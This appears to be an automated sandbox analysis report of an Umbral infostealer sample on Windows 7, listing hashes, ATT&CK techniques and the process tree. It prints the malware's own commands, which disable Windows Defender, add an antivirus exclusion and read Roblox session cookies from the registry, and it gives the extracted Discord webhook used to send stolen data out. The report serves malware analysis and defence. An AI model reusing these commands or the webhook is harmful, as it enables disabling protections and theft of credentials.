Analysis
-
max time kernel
118s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
22-08-2024 22:58
Static task
static1
Behavioral task
behavioral1
Sample
cbe01fe4646cb0bf553e56fab6049ea0N.exe
Resource
win7-20240708-en
General
-
Target
cbe01fe4646cb0bf553e56fab6049ea0N.exe
-
Size
332KB
-
MD5
cbe01fe4646cb0bf553e56fab6049ea0
-
SHA1
74323c61e5e6af54a185db9055a63b58164a0875
-
SHA256
084d8dae75296d5278702a13359c8869ea6919de5e0f3e939d0e786771238614
-
SHA512
231f36ca6f9904dee27d8bd663f2210686f1b999341bf5da4aa6726785cbfa78df9af9ca2095cc918682ec215e92509beb34ea294b88eeabfa74f263ec801bc3
-
SSDEEP
6144:tqS31vVrANegm9Wv3IOm+I3Wy6VlWd40pKr/zZ5wBJqsycOPAahF:4S7PWvSR3WTVl50wrN5wDq//A
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1270503478661218436/lYjczFpScyBiK0vTfbrRGM7w5iZQZYGn5ZBMz2hf0cegpXKTgRn6umRYCB_UZguXyf4o
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x00090000000120f8-8.dat family_umbral behavioral1/memory/2560-11-0x0000000000C40000-0x0000000000C80000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
pid Process 572 powershell.exe 1796 powershell.exe 2248 powershell.exe 1676 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral.exe -
Executes dropped EXE 2 IoCs
pid Process 2560 Umbral.exe 1644 svchost.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 10 discord.com 11 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1948 cmd.exe 992 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2348 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 992 PING.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2560 Umbral.exe 1676 powershell.exe 1796 powershell.exe 2248 powershell.exe 1040 powershell.exe 572 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2560 Umbral.exe Token: SeIncreaseQuotaPrivilege 2748 wmic.exe Token: SeSecurityPrivilege 2748 wmic.exe Token: SeTakeOwnershipPrivilege 2748 wmic.exe Token: SeLoadDriverPrivilege 2748 wmic.exe Token: SeSystemProfilePrivilege 2748 wmic.exe Token: SeSystemtimePrivilege 2748 wmic.exe Token: SeProfSingleProcessPrivilege 2748 wmic.exe Token: SeIncBasePriorityPrivilege 2748 wmic.exe Token: SeCreatePagefilePrivilege 2748 wmic.exe Token: SeBackupPrivilege 2748 wmic.exe Token: SeRestorePrivilege 2748 wmic.exe Token: SeShutdownPrivilege 2748 wmic.exe Token: SeDebugPrivilege 2748 wmic.exe Token: SeSystemEnvironmentPrivilege 2748 wmic.exe Token: SeRemoteShutdownPrivilege 2748 wmic.exe Token: SeUndockPrivilege 2748 wmic.exe Token: SeManageVolumePrivilege 2748 wmic.exe Token: 33 2748 wmic.exe Token: 34 2748 wmic.exe Token: 35 2748 wmic.exe Token: SeIncreaseQuotaPrivilege 2748 wmic.exe Token: SeSecurityPrivilege 2748 wmic.exe Token: SeTakeOwnershipPrivilege 2748 wmic.exe Token: SeLoadDriverPrivilege 2748 wmic.exe Token: SeSystemProfilePrivilege 2748 wmic.exe Token: SeSystemtimePrivilege 2748 wmic.exe Token: SeProfSingleProcessPrivilege 2748 wmic.exe Token: SeIncBasePriorityPrivilege 2748 wmic.exe Token: SeCreatePagefilePrivilege 2748 wmic.exe Token: SeBackupPrivilege 2748 wmic.exe Token: SeRestorePrivilege 2748 wmic.exe Token: SeShutdownPrivilege 2748 wmic.exe Token: SeDebugPrivilege 2748 wmic.exe Token: SeSystemEnvironmentPrivilege 2748 wmic.exe Token: SeRemoteShutdownPrivilege 2748 wmic.exe Token: SeUndockPrivilege 2748 wmic.exe Token: SeManageVolumePrivilege 2748 wmic.exe Token: 33 2748 wmic.exe Token: 34 2748 wmic.exe Token: 35 2748 wmic.exe Token: SeDebugPrivilege 1676 powershell.exe Token: SeDebugPrivilege 1796 powershell.exe Token: SeDebugPrivilege 2248 powershell.exe Token: SeDebugPrivilege 1040 powershell.exe Token: SeIncreaseQuotaPrivilege 328 wmic.exe Token: SeSecurityPrivilege 328 wmic.exe Token: SeTakeOwnershipPrivilege 328 wmic.exe Token: SeLoadDriverPrivilege 328 wmic.exe Token: SeSystemProfilePrivilege 328 wmic.exe Token: SeSystemtimePrivilege 328 wmic.exe Token: SeProfSingleProcessPrivilege 328 wmic.exe Token: SeIncBasePriorityPrivilege 328 wmic.exe Token: SeCreatePagefilePrivilege 328 wmic.exe Token: SeBackupPrivilege 328 wmic.exe Token: SeRestorePrivilege 328 wmic.exe Token: SeShutdownPrivilege 328 wmic.exe Token: SeDebugPrivilege 328 wmic.exe Token: SeSystemEnvironmentPrivilege 328 wmic.exe Token: SeRemoteShutdownPrivilege 328 wmic.exe Token: SeUndockPrivilege 328 wmic.exe Token: SeManageVolumePrivilege 328 wmic.exe Token: 33 328 wmic.exe Token: 34 328 wmic.exe -
Suspicious use of WriteProcessMemory 45 IoCs
description pid Process procid_target PID 2416 wrote to memory of 2560 2416 cbe01fe4646cb0bf553e56fab6049ea0N.exe 30 PID 2416 wrote to memory of 2560 2416 cbe01fe4646cb0bf553e56fab6049ea0N.exe 30 PID 2416 wrote to memory of 2560 2416 cbe01fe4646cb0bf553e56fab6049ea0N.exe 30 PID 2416 wrote to memory of 1644 2416 cbe01fe4646cb0bf553e56fab6049ea0N.exe 31 PID 2416 wrote to memory of 1644 2416 cbe01fe4646cb0bf553e56fab6049ea0N.exe 31 PID 2416 wrote to memory of 1644 2416 cbe01fe4646cb0bf553e56fab6049ea0N.exe 31 PID 2560 wrote to memory of 2748 2560 Umbral.exe 34 PID 2560 wrote to memory of 2748 2560 Umbral.exe 34 PID 2560 wrote to memory of 2748 2560 Umbral.exe 34 PID 2560 wrote to memory of 2268 2560 Umbral.exe 36 PID 2560 wrote to memory of 2268 2560 Umbral.exe 36 PID 2560 wrote to memory of 2268 2560 Umbral.exe 36 PID 2560 wrote to memory of 1676 2560 Umbral.exe 38 PID 2560 wrote to memory of 1676 2560 Umbral.exe 38 PID 2560 wrote to memory of 1676 2560 Umbral.exe 38 PID 2560 wrote to memory of 1796 2560 Umbral.exe 40 PID 2560 wrote to memory of 1796 2560 Umbral.exe 40 PID 2560 wrote to memory of 1796 2560 Umbral.exe 40 PID 2560 wrote to memory of 2248 2560 Umbral.exe 42 PID 2560 wrote to memory of 2248 2560 Umbral.exe 42 PID 2560 wrote to memory of 2248 2560 Umbral.exe 42 PID 2560 wrote to memory of 1040 2560 Umbral.exe 44 PID 2560 wrote to memory of 1040 2560 Umbral.exe 44 PID 2560 wrote to memory of 1040 2560 Umbral.exe 44 PID 2560 wrote to memory of 328 2560 Umbral.exe 46 PID 2560 wrote to memory of 328 2560 Umbral.exe 46 PID 2560 wrote to memory of 328 2560 Umbral.exe 46 PID 2560 wrote to memory of 1752 2560 Umbral.exe 48 PID 2560 wrote to memory of 1752 2560 Umbral.exe 48 PID 2560 wrote to memory of 1752 2560 Umbral.exe 48 PID 2560 wrote to memory of 1664 2560 Umbral.exe 50 PID 2560 wrote to memory of 1664 2560 Umbral.exe 50 PID 2560 wrote to memory of 1664 2560 Umbral.exe 50 PID 2560 wrote to memory of 572 2560 Umbral.exe 52 PID 2560 wrote to memory of 572 2560 Umbral.exe 52 PID 2560 wrote to memory of 572 2560 Umbral.exe 52 PID 2560 wrote to memory of 2348 2560 Umbral.exe 54 PID 2560 wrote to memory of 2348 2560 Umbral.exe 54 PID 2560 wrote to memory of 2348 2560 Umbral.exe 54 PID 2560 wrote to memory of 1948 2560 Umbral.exe 56 PID 2560 wrote to memory of 1948 2560 Umbral.exe 56 PID 2560 wrote to memory of 1948 2560 Umbral.exe 56 PID 1948 wrote to memory of 992 1948 cmd.exe 58 PID 1948 wrote to memory of 992 1948 cmd.exe 58 PID 1948 wrote to memory of 992 1948 cmd.exe 58 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2268 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\cbe01fe4646cb0bf553e56fab6049ea0N.exe"C:\Users\Admin\AppData\Local\Temp\cbe01fe4646cb0bf553e56fab6049ea0N.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2748
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"3⤵
- Views/modifies file attributes
PID:2268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1040
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:328
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:1752
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:1664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:572
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:2348
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Windows\system32\PING.EXEping localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:992
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"2⤵
- Executes dropped EXE
PID:1644
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
231KB
MD5a733fa354827ee6841d92540f7031823
SHA112d0420484d4aee5945633298824003c1715815a
SHA2569da608bc82962c952329648689186ab278007ec0895ce14d136dd0cc48eddc34
SHA512ce699c379824cf4134cc134b9d803fe6cd7b2e3ab9a79af8ddd8f95713ffe67f96ab2fd04310f4700715bf9db2d1a8a0699bf916f6405fdcf6c66789e9764832
-
Filesize
479KB
MD5dd6cec99223a8139819a04b08a53ef6a
SHA17941a00b799f614af2d212322304ed3c403cdc6b
SHA2568f541cf02aa94b2d9a9f6c8ef1cd88ed56211394ec209d12a48b3507846ef65d
SHA512d18b8d4ca61c35678ef220f90e09d2a3dea36beb46b76aaf63605c521ffcc34d77e3c1a7ad323f749edf4b0749da3eaf80b7b3ea50af5eeaae5d96ba3cb3aff7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\23Q7FHT4F3A95VTU20UE.temp
Filesize7KB
MD5da2c17c79c881f64f251c90efc68d398
SHA16306d0b0085881fb9a2ab5069098f428c9b31df7
SHA25606f22ed88a35b6d84a6bdc8290fb52f1d130aee946192fc6303ba97d7cf936a6
SHA512c05d74393c9847ed6db094a59c80726e56e415c6fbf0ac121ca0c6c8938e0b1e55b9ca50934abf905bf012b65d6ef764998af1b1a6b815d13ff87ab30ba327cb